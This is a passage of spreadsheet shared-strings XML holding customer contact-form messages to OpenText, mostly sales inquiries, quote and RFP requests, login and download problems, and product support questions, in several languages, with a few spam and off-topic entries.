    <t xml:space="preserve">I'm looking for a cloud managed fax over IP service that has the following capabilities:  automatic download to local storage device, ~3500 page / month capability, PHI/HIPAA compliant, never busy/rollover line.  </t>
  </si>
  <si>
    <t xml:space="preserve">I work for Capital One's Strategic Sourcing area supporting our Commercial Bank.  We are planning an RFP for Integrated Receivables and we would like for you to participate.  Can you please email me the Point of Contact information for your Sales representative that would be responding to the RFP? </t>
  </si>
  <si>
    <t>Dears_x000D_
_x000D_
AVP is a company dedicated for about 20 years to security. We have unique representations for Ecuador such as Cellebrite and IBM i2. The government and intelligence are our customers of these products._x000D_
_x000D_
Now, to diversify our catalog, we are looking for new solutions that adapt to the needs of our customers._x000D_
_x000D_
Reviewing your products, we believe that we can reach our customers with their solutions, which will be of great interest._x000D_
_x000D_
That is why, through this message, we request a videoconference in which we can meet and, if necessary, represent them in our country._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>CR</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
We would like to purchase your solution for one of our clients, we need to know about pricing, requirements, ordering process, etc._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Hello, I am looking for a sales rep. with OpenText that supports the Booz Allen Federal account. I will appreciate it if you connect me with this person or better still, have someone reach out to me via email/phone to discuss. Thank you.</t>
  </si>
  <si>
    <t>Dear opentext team,_x000D_
_x000D_
I am writing to you for and on behalf of Siemens Healthineers. We are a worldwide operating company in the healthcare sector with about 50.000 employees, with strongest FTE food print in Germany and the US. Due to legal requirements, we are currently searching for a vendor that offers legal matter filing solutions. A high-level description of the service scope is as follows:_x000D_
_x000D_
1.	Implementation of a document and email management system in order to _x000D_
o	manage and collaborate on documents and emails, and _x000D_
o	provide matter-based long-time archive solution for documents and emails (matter filing)._x000D_
2.	Migration of documents and emails from existing matter filing system including folder structure._x000D_
_x000D_
We are planning to have a long-term relationship with approximately 200-250 users of the matter filing system worldwide._x000D_
_x000D_
In case of interest please respond to this email. I will then provide first requirements and specification in order to have introductory alignments and product presentations. Afterwards, in case your solution meets the initial requirements to the extent required, our IT department may be involved in order to conduct the proper RFP process according to our internal standards._x000D_
_x000D_
Do not hesitate to contact me in case of any questions.</t>
  </si>
  <si>
    <t>We need some help with using Tableau TX1, but i am unable to access the support section to create a ticket.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like access to Opentext My Support. I work for SAP and would like to know who to contact to open the access to it for me._x000D_
_x000D_
thank you </t>
  </si>
  <si>
    <t>Please help.  I've registered for my first OnDemand class, DF120, but cannot see how on earth I can access it.  It also keeps asking me about the MySupport thing, which sounds good, but I have no idea if my company has that or not.  It's asking me questions I do not know the answer to.  It would be a lot easier if you all had chat as a support option so I could get immediate answers.  Please reply asap if possible... thanks!</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I am not working for any company now, however i am looking to get access to knowledge center of opentext. Is it possible to get access for learning purpose? If it is chargeable, please let me know the cost too.</t>
  </si>
  <si>
    <t>We are looking for email management solution.</t>
  </si>
  <si>
    <t>we are trying to connect a Konica Minolta MFP for a demo . where would i get a  connector to set that up</t>
  </si>
  <si>
    <t>KY</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I’m a business student at Eastern Kentucky University and I need to briefly interview local business executives for my Managerial Reports class, and I would very much like your business to be one of the businesses I can learn about. I am available for the next week:_x000D_
•	Monday and Wednesday 7:30 am-10:00 am and any time after 5 pm_x000D_
•	Tuesday and Thursday 7:30 am - 9 am and any time after 4 pm_x000D_
•	Any time Friday or on the weekend anytime within the next 2 weeks_x000D_
Please let me know if you are free and interested, thank you._x000D_
Sincerely, _x000D_
Shayne Wathen_x000D_
</t>
  </si>
  <si>
    <t>GU</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Boss&amp;Hall — поможем выбрать идеальную квартиру и сэкономить время _x000D_
Стоимость хорошего элитного жилья измеряется десятками миллионов рублей. За эту сумму Вы хотите и рассчитываете получить определенный уровень комфорта, заранее оговоренный набор привилегий и дополнительных преимуществ. _x000D_
Большинство застройщиков готовы дать Вам основу, скажем, клубную квартиру или пентхаус, который примерно на 50% соответствует параметрам Вашей мечты. Чтобы довести проект до ума, приходится разрабатывать сложную дизайнерскую концепцию, прорабатывать и согласовывать массу деталей. _x000D_
Если у Вас нет времени для этой ответственной и важной работы — поручите ее эксперту по рынку недвижимости из Boss&amp;Hall. У нас работают опытные специалисты, которые помогут приобрести квартиру мечты, не нарушая привычного графика Вашей жизни. </t>
  </si>
  <si>
    <t>Olá, gostaria de mais detalhes sobre a solução de ECM de vocês para pedir uma proposta._x000D_
_x000D_
abs</t>
  </si>
  <si>
    <t>can you please provide a quote to renew the maintenance on asset owned by FDIC? please refer to FDIC-10145609</t>
  </si>
  <si>
    <t xml:space="preserve">Für einen unserer Kunden sollen wir klären, ob es für sein Red Dot Intranet einen Connector für die SharePoint Suche gibt. Können Sie mir hier aktuelles Informationsmaterial zukommen lasen. </t>
  </si>
  <si>
    <t>We are looking for aspiring to open text exceed on demand kind of connectivity to connect Linux server from Windows . Linux servers are used for running engineering VLSI applications. Wanted to check on License part of this product. Need to purchase server licenses and client License or client License is default do not need separate purchase.</t>
  </si>
  <si>
    <t>Khan</t>
  </si>
  <si>
    <t>I need some financial help</t>
  </si>
  <si>
    <t>Not able to make ePayments - it errors out.</t>
  </si>
  <si>
    <t>PK</t>
  </si>
  <si>
    <t>Hi, We are an international News Wire service. We disseminate and spread news of different companies, NGO'S and associations etc through our world wide network. Could you please include our email address rightvision.org@gmail.com for any UPDATES/NEWS/PRESS RELEASES/ REPORTS/PUBLICATIONS/SURVEYS etc. Please deliver them as soon as they are available._x000D_
_x000D_
_x000D_
Many thanks for your kind support!_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Right Vision Team</t>
  </si>
  <si>
    <t>We need to renew our contrat for OpenText Exstream, and I want to kno if it's possible to buy directly with Opentext without any reseller ?</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning._x000D_
_x000D_
I am part of the IT Security Team at the NASA Glenn Research Center.  _x000D_
As such, I ensure that all  NASA Glenn IT purchase requests comply with Section 514 of the Consolidated Appropriations Act, 2018._x000D_
  _x000D_
To do so, the country of origin information must be obtained from the company that develops, produces, manufactures, or assembles the product(s).  _x000D_
Specifically, identify the country where each of the following products were developed, manufactured, and assembled:_x000D_
_x000D_
•	Exceed 3D (software, license, and 1yr maintenance)_x000D_
_x000D_
Additionally, if the country of origin is outside the United States, please provide any information you may have stating that testing is performed in the United States prior to supplying products to customers._x000D_
 _x000D_
Thank you and I look forward to your response._x000D_
_x000D_
John_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Suche nach einer Software für HR zur Erstellung und Verwaltung von Dokumenten wie Arbeits- und Fahrzeugüberlassungsverträgen, Betriebsratsanhörungen, Zeugnissen usw._x000D_
Anwender: 35 HR-Mitarbeiter, 10 Betriebsratsgremien, 150 Manager, 2.400 Mitarbeiter, Bewerber_x000D_
Schnittstellen: SAP HCM, SAP SuccessFactors Recruiting, digitale Personalakte, Anbieter von rechtlich geprüften Textbausteinen </t>
  </si>
  <si>
    <t>I need to activate the license and download the software from My Support._x000D_
End User: 10485563 - AOU Sassari - Azienda Ospedaliera</t>
  </si>
  <si>
    <t xml:space="preserve">Several years ago we had 3 Birst appliances installed for reporting against OpenText.  I hear that OpenText has discontinued offering this product, but I'm wondering what the last version of these appliances that would have been supported through OpenText would be and if there is upgrade path for us.   The current appliances are running Windows 2008 R2 OS and SQL 2008.  As SQL 2008 goes out of support in a few months, we are trying to determine the best course of action to get to a supported platform._x000D_
_x000D_
I did try contacting Birst, but they said that we do not have any listing of our company for support, as they appliances were purchased through OpenText.   </t>
  </si>
  <si>
    <t xml:space="preserve">Please email me to provide screenshots ._x000D_
_x000D_
Steps taken:  Made sure Windows Service:  IIS Admin Service and EnCase Security Web Application are running._x000D_
Checked the application pool, in trying to restart the EnCase EndPoint Security Web Pool received error message (see screen shot)._x000D_
_x000D_
Also, RSRCNENCEX1MC continuously runs out of space under the C drive.  Our virtualization team as of today has given us an additional 10 gigs, however would like to know which files I can or cannot delete and/or move to another drive._x000D_
_x000D_
Please provide guidance on moving forward, restoring/restarting the EnCase Security Web pool, thank you in advance._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Dame,_x000D_
Sehr geehrter Herr,_x000D_
als Beratungsunternehmen suchen wir im Auftrag eines Kunden nach einer Softwarelösung, mit der dessen Lieferkette über mehrere Tier überwacht werden kann. Es sollen Statusinformationen aus SOLL IST Abgleichen von Prozess-Zeitstempeln erstellt werden. Eine Steuerung der Kette ist nicht vorgesehen._x000D_
Dabei sind wir auf Ihre Produkte zur Supply Chain Transparenz gestoßen._x000D_
 Zur Klärung der grundsätzlichen Eignung möchte ich mich mit Ihnen telefonisch abstimmen._x000D_
 Bitte senden Sie mir einen Terminvorschlag für ein Telefonat zu._x000D_
Im Voraus vielen Dank._x000D_
Freundlich grüßt_x000D_
_x000D_
Sebastian Schlaus_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello opentext support,_x000D_
_x000D_
for our customer "EulerHermes" we need to have the latest Captiva Capture Release Notes and also the HW/SW-Dependency matrices - can you please tell me how to gather these information, as my user profile seems to be not allowed to receive login to this area. Furthermore, where can I obtain the latest fixpacks for Captive Capture?_x000D_
_x000D_
Thanks a lot and kind regards,_x000D_
Achim Drescher_x000D_
Senior Service &amp; Support Engineer_x000D_
Enterprise Information Management (EIM)_x000D_
_x000D_
Service Manager_x000D_
 _x000D_
CENIT AG_x000D_
Industriestraße 52-54_x000D_
70565 Stuttgart-Vaihingen_x000D_
_x000D_
Tel.:    +49 (0) 711 7825 – 3217_x000D_
Fax:    +49 (0) 711 7825 44 - 4217_x000D_
Mobil:  +49 (0) 151 52745 - 306_x000D_
_x000D_
a.drescher@cenit.com_x000D_
</t>
  </si>
  <si>
    <t>Philips is looking for content distribution Service to it's FSEs from PTC Windchill PLM._x000D_
Doe your publishing product support the massive usage of the tool for 2D/3D content distribution.</t>
  </si>
  <si>
    <t>Not Applicable</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
We are currently doing an SAP implementation with a customer who is interested in Vendor Invoice Management. _x000D_
How can we obtain a demo licence for our own demo tenant, so we can give them a detailed solution overview._x000D_
_x000D_
Kind regards_x000D_
Koen_x000D_
</t>
  </si>
  <si>
    <t>HK</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for document management solution fro a HK customer. Please kindly reach out to me at your earliest convenience </t>
  </si>
  <si>
    <t>I have forgotten my password, please it be reset. Thanks</t>
  </si>
  <si>
    <t>Do u have a Trial  Documentum version to test for all available features?</t>
  </si>
  <si>
    <t>AE</t>
  </si>
  <si>
    <t>JP</t>
  </si>
  <si>
    <t>Tokyo</t>
  </si>
  <si>
    <t>Hi Elite program,_x000D_
_x000D_
I'm OpenText AE of OEM with customer base  in Japan._x000D_
I want to know if Fujitsu Japan HQ and PFU is a current Elite Partner or not.  I see Fujitsu America as a Elite partner. If not would you let me know how they could join as a Elite program and the benefit pls?  Thank you._x000D_
_x000D_
Regards,_x000D_
David</t>
  </si>
  <si>
    <t>We are currently in the process of identifying a strategic Invoice-to-Post solution to automate our multi-channel Supplier Invoice process. I want someone to contact me as soon as possible for RFI process during which we would like to have a demo of your Opentext VIM solution's capabilities,</t>
  </si>
  <si>
    <t>Dear Opentext,_x000D_
_x000D_
Good Day! This is Kathryn from Mapua CCESC Department Makati._x000D_
The CCESC Department is the training arm of Mapua University.  We hold seminars/workshops/trainings for professionals. _x000D_
_x000D_
I am writing to you to introduce our new programs as we have added more short courses/trainings since the last time we trained some employees from Opentext._x000D_
May I know to whom can I send our list of course outlines?_x000D_
_x000D_
Your response will be highly appreciated. _x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Hello Opentext team. _x000D_
_x000D_
We at Six30 Labs are developing a web application, which includes a universal file viewer where the user can view MS Office files and CAD files - along with annotations and markups. _x000D_
_x000D_
We are using PHP for building our application. If it is compatible to use your software with our backend scripting language, please let us know about your supported development platforms along with your quotations for the same._x000D_
_x000D_
Thank You.</t>
  </si>
  <si>
    <t>I will like to assess cloud-based content management software to streamlines RFQ, engineering drawings, submittal, and document management for architects, contractors, engineers, and owners.</t>
  </si>
  <si>
    <t>Where can I download opentext exstream designer software? Thanks.</t>
  </si>
  <si>
    <t>How to configure delivery engine of Exstream to blacklisted recipient mail address?</t>
  </si>
  <si>
    <t>JO</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would be grateful if you could send me a quote for _x000D_
OpenText Application Governance &amp; Archiving for Microsoft SharePoint and_x000D_
OpenText Extended ECM for Microsoft Office 365 _x000D_
For 100 user</t>
  </si>
  <si>
    <t>NE</t>
  </si>
  <si>
    <t>❤️ _x000D_
Greetings. You have a great site. And good business. Congratulations on the new year of the kangaroo on the Asian calendar. Successes and prosperity!</t>
  </si>
  <si>
    <t>Question(s) about the certification exam 'OpenText Content Server Business Consultant Certification v16.2.4'_x000D_
coursedetails.html?id=2729 _x000D_
_x000D_
This certification lists 5 pre-requisite trainings._x000D_
We have few consultants who have attended several Content Server trainings in recent years, but mostly for version 10.5.0._x000D_
_x000D_
1) Is there a 'delta' certification offering for users that are familiar with 10.5.0?_x000D_
2) If the consultants feel confident for the exam, can they just attempt the exam, if fail, can try a 2nd time. If fail again would have to attend all pre-req training sessions? Reason is of course cost, it is very difficult to justify attending 6 quite costly trainings in order to gain that certification._x000D_
3) There is also this: 5-0151 OpenText Content Server Business Consultant Certification Program v16.2 coursedetails.html?id=2588 (3 days). However, there are no trainings scheduled as per your website._x000D_
_x000D_
We are located in Australia_x000D_
_x000D_
Thanks very much!_x000D_
Matthias Haugeneder</t>
  </si>
  <si>
    <t>LT</t>
  </si>
  <si>
    <t>Hi,_x000D_
cannot login to accout: audrius.mackinis@novusit.lt_x000D_
Also have issue to get to support -&gt; My Support page..._x000D_
Need to download EnCase Forensic</t>
  </si>
  <si>
    <t>BV</t>
  </si>
  <si>
    <t>OK</t>
  </si>
  <si>
    <t>★ _x000D_
Greetings. You have a great site. And good business. Congratulations on the new year of the kangaroo on the Asian calendar. Successes and prosperity!</t>
  </si>
  <si>
    <t>Im fine</t>
  </si>
  <si>
    <t>VN</t>
  </si>
  <si>
    <t>Nguyen van sinh</t>
  </si>
  <si>
    <t xml:space="preserve">Why do I have a charge on my credit card for $2.02?  </t>
  </si>
  <si>
    <t>Hello,_x000D_
does StreamServer 5.6.2 database support Microsoft SQL Server 2017?_x000D_
I see that in documentation it said 2012,2014,2016 but maybe something changed.._x000D_
_x000D_
Best regards,_x000D_
Igor</t>
  </si>
  <si>
    <t>Teacher</t>
  </si>
  <si>
    <t>PT</t>
  </si>
  <si>
    <t>Can I have access to a presentation of all opentext products, description of the purpose, what they do and licensing terms and metrics please?_x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Bernardo</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like to know more about managed services for fax. This is for a tender proposal that requires fax services. At this moment, i only know fax is required. Others detail, I'm still waiting responses from customer. _x000D_
_x000D_
Cheers</t>
  </si>
  <si>
    <t>Dear customer service, I watch Fox Sports Midwest on Suddenlink Cable in Mountain Home AR 72653. I love many of the programs you broadcast, especially St Louis Cardinal baseball. My problem is that the channel guide provided via the Cable system is rarely correct. It makes searching for what is available impossible-  in fact, if I didn’t have a paper copy of the Cards schedule, I wouldn’t even know when to watch! There must be some sort of mistake about which “guide” you are providing to them. This has been going on for over a year. I would really appreciate if this confusion could be cleared up. I can’t record games until this gets fixed.</t>
  </si>
  <si>
    <t>I would like to find out which OpenText software product has replaced what was formerly known as Hummingbird Exceed?</t>
  </si>
  <si>
    <t>Personal</t>
  </si>
  <si>
    <t>Is there a FirstClass Server demo software available.  I used FirstClass software many years ago and I am interested in seeing if it would work for a business model I am considering for the near future.  I would like information on licensing costs as well to see if it is cost effective.</t>
  </si>
  <si>
    <t>I cannot collect Archive Emails from o365 email using Encase eDisccovery v6.1. There are no errors</t>
  </si>
  <si>
    <t>GM</t>
  </si>
  <si>
    <t>I am interested to know if you can help us obtain Business Contacts for marketing (Name, Job Title, email address, DD telephone number, Mobile, company address) from Vertical  market, position type and geography: the US and Europe), If you do I have a brief I would like to send you. I permit you to contact me only if you think you can help with this regard.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Chin. I am a lecturer at RMIT University Melbourne, Australia. _x000D_
_x000D_
I’m reaching out to ask the permission to have access to OpenText Sentiment Analysis for educational purposes. _x000D_
_x000D_
I have used 'Crimson Hexagon Forsight'  between 2017 to 2018 for my research and teaching purposes. However, I have stopped using this application due to some limitations. _x000D_
_x000D_
This year, I would like to try out a new Sentiment Analysis application (i.e. OpenText ) for research and teaching purposes. Just wondering do you have a trial version for educational purposes? Or grant full access to academic for a limited period? _x000D_
_x000D_
Description of the intended use:_x000D_
Research and teaching purposes._x000D_
The application will be used by myself (teaching staff)._x000D_
The application will not be used/accessed by students. _x000D_
The application will be used/accessed by other staff members. _x000D_
_x000D_
I would be very grateful for your permission. If you require any additional information, do not hesitate to contact me_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>MC</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am looking for more detailed information regarding OpenText Vendor Invoice Management for SAP Solutions._x000D_
I found:_x000D_
opentext-vim-product-overview.pdf_x000D_
can you provide a more detailed document regarding the product features? Especially on the workflow._x000D_
Thanks_x000D_
_x000D_
Product features _x000D_
Enters invoices from any source From any location, via all input channels and in any format directly into the ERP system. _x000D_
Automates invoice data extraction Integrates with Information Extraction Service to cull invoice header and line item details quickly, reliably and automatically, based on a knowledge base of thousands of invoice samples in combination with machine learning. _x000D_
Optimizes the review and approval process Intelligently enriches missing information, offers controlled and automated exception detection and handling, parallel approvals, escalations, invoice posting and reporting, resulting in a reduced cost per transaction. _x000D_
Leverages designated workflows Provides predefined workflows with robust and extensible baseline functionality, shortening implementation time and reducing deployment costs. _x000D_
Automates invoice routing and sorting Designated workflow steps sort and route invoices based on user roles, authorization rules, priorities and predefined timelines to ensure actions are taken by individuals with both the applicable knowledge and security access. _x000D_
Generates reports Uses built-in reports and data models based on company code, business unit, supplier, exception type, liability and more to turn insights into action. _x000D_
Drills down into invoice information Accesses applications, content and history using intuitive, graphical dashboards with buttons that drill down into the original invoice image and information, purchase order and goods receipt._x000D_
</t>
  </si>
  <si>
    <t>Unable to download or get a link for encase forensic imager to download. I filled the form multiple times and nothing happens or just submits and nothing. Can you please help or send me the link to download. Also does encase 8 do remote data acquisition?</t>
  </si>
  <si>
    <t>I need an email stating OpenText exceed 15 is still supported</t>
  </si>
  <si>
    <t>Hi - I am having trouble accessing Media Manager within our company's intranet. If this is not the correct channel to go through, could you direct me to someone that can help? I've tried to access Oracle Media Manager on 2 different platforms, but after entering my SSO credentials I am immediately logged out. I was able to access the site prior to my maternity leave, but now cannot figure out the correct privilege in order to allow access to it again. Thanks in advance</t>
  </si>
  <si>
    <t>TEST, TEST</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have two questions about the functionality of RightFax:_x000D_
_x000D_
1. Is it possible for two users to receive the fax confirmation / "read receipt" page (e.g. both the sender and another user)?_x000D_
2. Is it possible for the fax confirmation to include both the confirmation page and a copy of the original fax pages?_x000D_
_x000D_
Thanks,_x000D_
Christine Hildreth</t>
  </si>
  <si>
    <t>Looking for VAN service to Dillards.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We would like to port our fax number into some other fax provider. We use our fax occasionally. I want to get a quote on most basic product. It would be great if you can add the monthly usage limits as well._x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>I looking for information on becoming a partner</t>
  </si>
  <si>
    <t>I received a new laptop and in the process have lost my access to Redact-It.  Can you please tell me how I can get my access back.  Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I am reaching out because Pacific Dental Services has interest in your faxing solutions. If someone could contact me I will be able to go over in needs in further detail. </t>
  </si>
  <si>
    <t>WY</t>
  </si>
  <si>
    <t>We are currently using Oracle Document Capture and Imaging products.   We are interested in the pricing out what a similar setup would be with the Open Text products.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to download EnCase and it was stating that my account does not allow this resource. </t>
  </si>
  <si>
    <t>I would like to reinstate our account please advise</t>
  </si>
  <si>
    <t>Family generation salvation from starvation and tortured by the habitat's and intelligence of the Michoacan Sinaloa Familia La Muerte Magia Negra Mafioso's and by the local law enforcement officers. That are false advertisement and criminals. Prolonging my family's rescue.</t>
  </si>
  <si>
    <t>Business</t>
  </si>
  <si>
    <t>You are allowing your customers to spam others. How do I know?  25 messages today about loans I never applied for, all coming from the xmr3 dot com website, which links to you. I let it go for a couple of days, but if you continue, I'll continue. Since YOU don't want to police your customers so that they stay legal, I'll do it for you.  Each email is going to be returned to you.  It would be really easy to block my email from your servers. That way...no muss, no fuss.</t>
  </si>
  <si>
    <t>NV</t>
  </si>
  <si>
    <t>Please call me in regards to account number 771125.  I am not familiar with the account and I see a couple invoices that are due.  Need more information please (contract, last paid date, etc).  Thank you.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm a consultant working on a case of a small publishing company and they have an issue managing their huge database of Photos and digital content for reuse. I Believe a DAM with automatic tagging capabilities would strongly help. _x000D_
Could you please send me more info about your product: _x000D_
- Is it a SaaS ?_x000D_
- What would be the price range of the DAM so I can assess their options_x000D_
- Any Module that would accelerate their publishing on multiple channels would also be interesting._x000D_
_x000D_
I'm just working on a strategic level so I just need an overview and approximate price ranges._x000D_
_x000D_
Thanks,_x000D_
Zied</t>
  </si>
  <si>
    <t>We have physical/copper analog fax machine now. _x000D_
Would like to use I-fax on our imagePRESS C650 copier instead._x000D_
Want it to be cloud-based, so they could also do things like email-to-fax and no longer need the copper line (just over ethernet and internet)._x000D_
Please contact me with options._x000D_
Note: We are already a customer of OpenText for several services._x000D_
Do not place me on any mailing/contact lists or share my contact info with any thing.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
We have an EDU enduser who is interested in EnCase Forensic Software and we were wondering if we would be able to offer this to our customer._x000D_
_x000D_
ScholarBuys is an academic technology solutions provider for K-Higher Education. We work nationally in the USA and do prefer to source our products through distributors in the USA if at all possible (like Ingram Micro, Tech Data, Douglas Stewart, etc). If not, we would still be interested in learning about options to purchase direct if we are able._x000D_
_x000D_
Please let me know at your soonest convenience so I can let our customer know if we can offer this product._x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
I want to reach out regarding your printed materials &amp; more. I know as you expand operation and grow as a company, it can be a little tricky to manage a variety of vendors of your t-shirts/hoodies, marketing collateral/swag, office/event signage, etc... So that's what we do it all! Let me be your one-stop-shop for everything with your logo on it!_x000D_
_x000D_
Thank you,_x000D_
Stephen Chen_x000D_
Sales &amp; Marketing_x000D_
Copymat Digibranch_x000D_
(415)981-1300_x000D_
</t>
  </si>
  <si>
    <t>I have problems when entering your brand page as a web error, and it would be very helpful if you help me solve that problem.</t>
  </si>
  <si>
    <t>KS</t>
  </si>
  <si>
    <t>I work for the Dept. of Children and Families, however I am contacting you on behalf of the Dept. of Aging w/ the Kansas State Government. We are in the process of completing a statewide project to move 98 percent of our server infrastructure to a cloud solution. The department of aging currently has a 20+ year old digital fax server, and that server cannot be moved to our cloud solution. So we are looking for a new solution, that is where you come in._x000D_
_x000D_
The server currently has 4 different phone numbers on it. The 4 numbers all seem to route to a singular e-mail. We are unsure at this time as to if we will be able to get clearance from the Governor to port those numbers away from the state and to a third party service (if that is even an option). So here is what I need to know;_x000D_
_x000D_
1) Do you know if it would be possible, in the event we have to get a 'new' fax number from you guys, if we would be able to setup forwarding from our current numbers to yours and it still function properly._x000D_
_x000D_
2) I need a quote as to what it would cost to obtain a new number for fax-to-email service of roughly 30 to 40 pages per day being sent (this is an average over the last 5 years taken from the fax server)._x000D_
_x000D_
3) I need the same quote but instead of a new number, it would be us porting our number over to you (if that is even possible)._x000D_
_x000D_
Let me know if you need any other information</t>
  </si>
  <si>
    <t>A request from OR DMV has been received to provide updated ALIR Trading Partner Profile information.  Per the instructions from OR DMV, if a 3rd party service bureau is eing used, the company is not responsible for sending the information; instead the 3rd party service bureau us to complete the required information.  I forward the email to nharripaul@easylink.com, but the email failed for non-delivery._x000D_
Today, we are sending our policy OR DMV data to Easylink using Sender ID OCAS OCAS033._x000D_
Could you please confirm you will be providing Oregon DMV the trading partner information?  The information must be received by April 12th. _x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
für einen Kunden im Schiffsbaubereich sind wir auf der Suche nach einem DMS mit einer wirklichen CAD Versionierungsfunktion. Aus einem damaligen Projekt mit Ihrem Produkt weiß ich, dass Sie diese Funktionalität im Content Server mit einem Zusatzmodul haben. Können Sie mir bitte eine Ansprechpartner nennen, mit dem ich die weiteren Anforderungen und ggf. die Vorführung via Webcast planen kann?_x000D_
Ich bin ab dem 08.04.2019 über meine Mobilnummer +49(0)15222555377 zu erreichen._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Michael Gayk_x000D_
Senior ECM Consultant _x000D_
_x000D_
Uzuner Consulting GmbH_x000D_
Lise-Meitner-Str. 2_x000D_
_x000D_
28359 Bremen_x000D_
_x000D_
Telefon: +49 (0) 421 40 89 56 0_x000D_
Mobil: +49 (0) 152 22 55  53 77_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning! I was looking to get a quote on having your service in use for 15-20 users and what specs are required to run it successfully. In addition, if you have any information in print about service (eg brochures) I would like a copy to give to my supervisors. Thank you!  </t>
  </si>
  <si>
    <t>We currently have Kofax version 10.8 and we are interested in upgrading to version 16. Would like to schedule a call with an account rep to learn more about features</t>
  </si>
  <si>
    <t>We are looking for a redaction product that includes a level of automation.  As a not for profit, open source or free to use, is preferable.  It is difficult to tell from your website, if your Redact-It product is free to use or not?  Can you please confirm.  Separately,  I understand that your professional services are chargeable, should we need them._x000D_
Thanks in advance.</t>
  </si>
  <si>
    <t>I am currently doing some testing with PDF documents. I was wondering which software is OpenText release 16 support? (Adobe Acrobat, Nuance, Foxit)_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">I would like some information and maybe a demo of how the Opentext sync and Share works.  </t>
  </si>
  <si>
    <t>I need to open a GXS ACTIVE CATALOG for our company.</t>
  </si>
  <si>
    <t>Error trying to make ePayment</t>
  </si>
  <si>
    <t>Hello, I'm trying to reset the password on my account, but this reset might be sending to someone that no longer works for the company.  Can someone please assist?</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
J'aimerai savoir si vous avez la dll "strsmon.dll" pour un Windows Server 2016 en 64 bits ?_x000D_
Cordialement,_x000D_
Vincent DELAHOCHE.</t>
  </si>
  <si>
    <t>I would like to submit an RFP for an OCR solution</t>
  </si>
  <si>
    <t>Do you offer a low volume EDI van solution ?_x000D_
_x000D_
This would be for less than 100 EDI invoices a month._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">We have a new customer how who wants us to deliver our reports in pdf only to his customers.  We are talking about around 1.600.000 pdfs doc. Do you have a solution for this? </t>
  </si>
  <si>
    <t>We need "Exceed 14 Service Pack 13 HotFix 16" accroding with the KB3654207. How can we get it?</t>
  </si>
  <si>
    <t>Prezados. Me chamo Diego Iglesias. Sou Supervisor de Tesouraria da Rede Bahia, maior grupo de comunicação do Nordeste com 6 televisões, 4 rádios, jornal e empresa de eventos. Gostaríamos de contato comercial para orçar serviço de VAN para os extratos bancários com objetivo de otimizar os trabalhos de nossa Tesouraria. Obrigado.</t>
  </si>
  <si>
    <t>We are looking for Solution at Philips for a Content Distribution Platform, which can publish/distribute the documents like huge service manuals and Creo illustrations 3D/2D online/offline in a secure manner to the field service engineers, based on the entitlements they have. The Source or Content Management System here is PTC Windchill and it needs to reach the Service Community through this publishing process</t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
_x000D_
We have been refereed to you by Anish Umarjikar, hear of EDI inside Wayfair/UK, with whom we are having increasing trading volumes these days._x000D_
We have agreed that we need an EDI connection between us to take care of the menial tasks of the every day trade, mainly imputing orders, issuing invoices &amp; keep them update of our stock positions._x000D_
_x000D_
According to Anish, you already provide such service to several of their suppliers, which have the same needs as we do._x000D_
_x000D_
At the moment we are using Quick Books as an accounting software, but we know that this is of no help to our growing business, so we have decided to move into_x000D_
a more suitable software, Sage 50 professional, which according to Anish can make such EDI connection with their system using a service like yours._x000D_
The move from QB to Sage will be done shortly before we agree to an EDI supplier, but I would like to have such move done sooner rather than later._x000D_
_x000D_
I would be grateful if you would let us know if your system supports Sage 50 and the costs of such EDI connection using your services_x000D_
_x000D_
I look forward to hearing from you soon,_x000D_
_x000D_
Rgs_x000D_
_x000D_
Alberto Chies_x000D_
_x000D_
Mob. 07725 429412_x000D_
email. achiesuk@gmail.com</t>
  </si>
  <si>
    <t>Evaluating BI Report and dashboard tool for internal use</t>
  </si>
  <si>
    <t>We provide StreamServe support and training for some of our customers._x000D_
We pay for OpenText support in their behalf._x000D_
In this case our customer is Gates Europe, your end-user ID for them is EU0168515_x000D_
Their support contract reference is RC391083, contract number is 0012219044_x000D_
They have support requirements for version 4.1 of StreamServe._x000D_
Could you please provide a download link, so I can install this version for the duration of a training class?</t>
  </si>
  <si>
    <t>Need to register my Product, not able to download encase forensics.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
